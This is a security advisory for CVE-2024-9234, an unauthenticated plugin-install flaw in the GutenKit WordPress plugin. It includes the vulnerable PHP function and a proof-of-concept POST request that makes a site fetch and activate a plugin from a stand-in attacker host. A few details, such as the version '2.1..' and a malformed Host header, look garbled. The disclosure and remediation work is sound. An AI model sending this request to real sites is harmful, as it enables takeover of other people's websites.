CVE-2024-9234: Unauthenticated Arbitrary File Uploads in GutenKit – Page Builder Blocks, Patterns, and Templates for Gutenberg Block Editor Plugin for WordPress

CVE-2024-9234 is a critical vulnerability in GutenKit – Page Builder Blocks, Patterns, and Templates for Gutenberg Block Editor plugin for WordPress, affecting all versions up to, and including, 2.1.. This issue allows unauthenticated attackers to install and activate arbitrary plugins by exploiting a missing capability check on the install_and_activate_plugin_from_external() function.

Plugin Description

GutenKit is a powerful plugin for WordPress that enables users to create beautiful and engaging content using Gutenberg Block Editor. It extends the basic Gutenberg editor with new custom blocks, templates, and patterns to enhance the design and functionality of web pages.

Vulnerability Details

The vulnerability stems from a missing capability check on the install_and_activate_plugin_from_external() function within the install-active-plugin REST API endpoint. This omission allows unauthenticated attackers to upload, install, and activate arbitrary plugins on the target WordPress sites. Moreover, it allows attackers to upload potentially malicious files disguised as plugins.

Below is the relevant code snippet that demonstrates the vulnerability

public function install_and_activate_plugin_from_external() {
    $plugin_url = esc_url_raw( wp_unslash( $_POST['gk_plugin_url'] ) );

    if ( filter_var( $plugin_url, FILTER_VALIDATE_URL ) ) {
        $this->install_plugin( $plugin_url );

        $plugin_file = $this->get_plugin_file_by_url( $plugin_url );
        $this->activate_plugin( $plugin_file );

        wp_send_json_success();
    } else {
        wp_send_json_error();
    }
}

Exploit POC (Proof of Concept)

To exploit this vulnerability, an attacker can craft a malicious POST request to the install-active-plugin REST API endpoint. As shown in the following example, the attacker would include a file disguised as a plugin, hosted on their own server:

POST /wp-json/gk/v1/install-active-plugin HTTP/1.1
Host: targetwordpresssite.com%20%20+
Content-Type: application/x-www-form-urlencoded

gk_plugin_url=http:%2F%2FEvilServer.com%2FEvilPlugin.php

Upon executing this request, the malicious file or plugin will be uploaded, installed, and activated on the target WordPress site.

Remediation

It is strongly recommended for all users of the GutenKit plugin to immediately update to the latest version (2.1.1 or higher) as soon as it becomes available, which should address the identified vulnerability.

It is equally important for website administrators to review their installed plugins for any suspicious or unauthorized plugins that may have been installed due to this vulnerability and remove them immediately.

References

- Original Vulnerability Disclosure
- WordPress Plugin Repository - GutenKit - Page Builder Blocks, Patterns, and Templates for Gutenberg Block Editor
- GutenKit Developer Update on CVE-2024-9234

Final Words

This vulnerability serves as a reminder of the importance of ensuring that all WordPress plugins undergo thorough security audits and are regularly updated. As part of a robust security policy, always keep your WordPress core, plugins, and themes up-to-date, and stay informed about current security issues, new releases, and fixes.

Timeline

Published on: 10/11/2024 13:15:18 UTC
Last modified on: 10/15/2024 12:58:51 UTC